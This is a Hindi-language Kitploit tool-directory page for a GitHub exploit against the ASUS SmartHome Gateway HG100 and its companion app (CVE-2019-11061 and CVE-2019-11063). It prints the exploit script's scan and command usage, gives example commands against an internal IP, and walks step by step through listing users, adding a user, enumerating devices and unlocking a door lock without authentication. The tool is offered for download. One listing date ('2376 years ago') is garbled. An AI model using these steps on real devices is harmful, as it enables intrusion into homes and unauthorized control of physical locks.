Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ASUS-SmartHome-Exploit — ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063 | Kitploit
उपकरण/GitHubGitHub/tim124058/asus-smarthome-exploit
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063

रिपॉजिटरी देखें
2376 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ASUS-SmartHome-Exploit

CVE पहचानकर्ता

CVE-2019-11061 : HG100 में टूटा हुआ एक्सेस कंट्रोल

प्रभावित उत्पाद : ASUS SmartHome Gateway HG100 फर्मवेयर संस्करण < 4.00.09

CVE-2019-11063 : SmartHome ऐप में टूटा हुआ एक्सेस कंट्रोल

प्रभावित उत्पाद : ASUS SmartHome Android ऐप संस्करण < 3.0.45_190701

विवरण

यदि हमलावर HG100 या साथी ऐप (android या iPhone) वाले मोबाइल डिवाइस के समान आंतरिक नेटवर्क पर है, तो हमलावर उन्हें नियंत्रण अनुरोध भेज सकता है।

हमलावर को फिर निम्नलिखित करने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है:
1. HG100 में जोड़े गए सभी उपयोगकर्ता नाम प्राप्त करें।
2. SmartHome Gateway (HG100) के अंतर्गत सभी उपकरणों की जानकारी प्राप्त करें।
3. SmartHome Gateway के अंतर्गत सभी नियंत्रणीय उपकरणों (जैसे DoorLock, Meter Plug ...) को नियंत्रित करें।
निम्नलिखित के लिए पासवर्ड (4 से 6 अंक, डिफ़ॉल्ट: "0000") आवश्यक है:
1. HG100 में उपयोगकर्ता जोड़ें।

शोषण का उपयोग:

शोषण योग्य पोर्ट स्कैन करें:

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

लक्ष्य को कमांड भेजें:

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

नोट: 2019/5/15 - ASUS ने SmartHome ऐप (3.0.42_190515) और Gateway (4.00.06) के लिए अपडेट जारी किया। और HTTP सेवा में SSL जोड़ा। लेकिन यह कमजोरी अभी भी मौजूद है। इस अपडेट के लिए, "cmd" तर्क का उपयोग करते समय आपको प्रोटोकॉल निर्दिष्ट करना होगा। उदाहरण के लिए:
root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

उपयोग उदाहरण:

चरण 1:

मोबाइल डिवाइस (एंड्रॉइड या iPhone के लिए साथी ऐप स्थापित) का शोषण योग्य पोर्ट स्कैन करें:
ऐप पोर्ट नोट: -v विकल्प HG100 में जोड़े गए उपयोगकर्ताओं को सूचीबद्ध करेगा।

या

HG100 का शोषण योग्य पोर्ट स्कैन करें:
HG100 पोर्ट

चरण 2:

एचजी100 में जोड़े गए सभी उपयोगकर्ताओं को प्राप्त करें: उपयोगकर्ताओं की सूची

या एक नया जोड़ें: उपयोगकर्ता जोड़ें

नोट: "cmd" तर्क के लिए https://10.42.50.166:8083 का उपयोग करें।
उदाहरण के लिए:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

चरण 3:

SmartHome Gateway के अंतर्गत सभी उपकरणों की जानकारी प्राप्त करें: उपकरणों की सूची नोट: यदि --user विकल्प सेट नहीं है, तो HG100 में पहला उपयोगकर्ता स्वचालित रूप से चुना जाएगा। (क्योंकि पासवर्ड की आवश्यकता नहीं है)

ऐप से तुलना करें:


चरण 4:

DoorLock को नियंत्रित (अनलॉक) करें। उपकरण नियंत्रण नोट: मान 1028 -l विकल्प (चरण 3) से प्राप्त हुआ है।

परिणाम:

टूल डाउनलोड करें